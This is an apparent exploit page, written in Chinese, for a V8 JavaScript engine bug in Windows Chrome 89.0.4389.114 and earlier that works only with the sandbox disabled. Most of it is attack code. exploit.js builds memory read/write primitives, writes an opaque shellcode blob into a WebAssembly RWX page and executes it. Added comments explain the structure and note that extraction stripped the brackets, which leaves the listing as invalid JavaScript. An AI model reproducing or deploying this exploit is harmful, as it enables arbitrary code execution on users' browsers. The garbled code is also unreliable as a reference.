前提条件
仅支持Windows Chrome
EXP
exploit.html
<!-- Loader page: its only content is the script include below; all of the
     logic lives in exploit.js (listed under the next heading). -->
<script src="exploit.js"></script>
exploit.js
// Proof-of-concept published on pwnwiki.com for a V8 (Chrome JavaScript
// engine) bug. Per the surrounding page text it targets Windows Chrome
// <= 89.0.4389.114 only, and only runs when the renderer sandbox is disabled;
// with the sandbox on the page reports STATUS_ACCESS_VIOLATION or a memory
// error. Mitigation therefore is to run a patched Chrome and to keep the
// sandbox enabled.
//
// NOTE(review): as reproduced here the listing is not valid JavaScript —
// index brackets and array-literal brackets were lost in extraction (e.g.
// `f64_buf0 = val`, `var cor = 1.1, 1.2, 1.3`, `return arr, cor;`). It is kept
// byte-identical below as a reference artifact, not as runnable code.
//
// Structure, as far as the visible text shows:
//   - wasm_code: a WebAssembly binary (bytes start with 0,97,115,109 =
//     "\0asm") that exports "memory" and "main"; it is compiled and
//     instantiated, and `f` is bound to the exported main.
//   - ftoi/itof: float<->integer type punning through a Float64Array and a
//     Uint32Array over the same 8-byte ArrayBuffer `buf`; results are BigInt.
//   - foo(): reads from a 2**31-element Uint32Array `_arr`, pushes the value
//     through Math.abs/Math.max arithmetic, allocates `new Array(x)` and
//     shifts it, then returns that array together with a float array `cor`.
//     It is called 0x3000 times first, then once more with `false`;
//     presumably warm-up so the optimizing JIT compiles it — not stated on
//     the page.
//   - addrof/fakeobj/arbread/arbwrite: the usual names for the primitives
//     built on the returned `arr`/`cor` pair and on `arr2`/`fake`; their
//     bodies only index those arrays via ftoi/itof.
//   - copy_shellcode(): overwrites the backing-store field of `buf2`
//     (addrof(buf2) + 0x14n) via arbwrite, then writes the `shellcode` words
//     through a DataView, so the write lands at `addr`.
//   - rwx_page_addr is read with arbread at addrof(wasm_instance) + 0x68n,
//     logged, used as the copy target, and then `f()` is invoked.
//   - `shellcode` is an opaque array of 32-bit words; nothing on the page
//     allows its contents to be verified — treat the blob as untrusted.
var wasm_code = new Uint8Array(0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11) var wasm_mod = new WebAssembly.Module(wasm_code); var wasm_instance = new WebAssembly.Instance(wasm_mod); var f = wasm_instance.exports.main; var buf = new ArrayBuffer(8); var f64_buf = new Float64Array(buf); var u64_buf = new Uint32Array(buf); let buf2 = new ArrayBuffer(0x150); function ftoi(val) { f64_buf0 = val; return BigInt(u64_buf0) + (BigInt(u64_buf1) << 32n); } function itof(val) { u64_buf0 = Number(val & 0xffffffffn); u64_buf1 = Number(val >> 32n); return f64_buf0; } const _arr = new Uint32Array(2**31); function foo(a) { var x = 1; x = (_arr0 ^ 0) + 1; x = Math.abs(x); x -= 2147483647; x = Math.max(x, 0); x -= 1; if(x==-1) x = 0; var arr = new Array(x); arr.shift(); var cor = 1.1, 1.2, 1.3; return arr, cor; } for(var i=0;i<0x3000;++i) foo(true); var x = foo(false); var arr = x0; var cor = x1; const idx = 6; arridx+10 = 0x4242; function addrof(k) { arridx+1 = k; return ftoi(cor0) & 0xffffffffn; } function fakeobj(k) { cor0 = itof(k); return arridx+1; } var float_array_map = ftoi(cor3); var arr2 = itof(float_array_map), 1.2, 2.3, 3.4; var fake = fakeobj(addrof(arr2) + 0x20n); function arbread(addr) { if (addr % 2n == 0) { addr += 1n; } arr21 = itof((2n << 32n) + addr - 8n); return (fake0); } function arbwrite(addr, val) { if (addr % 2n == 0) { addr += 1n; } arr21 = itof((2n << 32n) + addr - 8n); fake0 = itof(BigInt(val)); } function copy_shellcode(addr, shellcode) { let dataview = new DataView(buf2); let buf_addr = addrof(buf2); let backing_store_addr = buf_addr + 0x14n; arbwrite(backing_store_addr, addr); for (let i = 0; i < shellcode.length; i++) { dataview.setUint32(4*i, shellcodei, true); } } var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) 
+ 0x68n)); console.log("+ Address of rwx page: " + rwx_page_addr.toString(16)); var shellcode = 3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957; copy_shellcode(rwx_page_addr, shellcode); f();
警告
使用该漏洞需要关闭沙箱环境,如果不关闭沙箱会提示 STATUS_ACCESS_VIOLATION 或者内存错误
关闭沙箱可以弹出计算器
版本
Chrome <=89.0.4389.114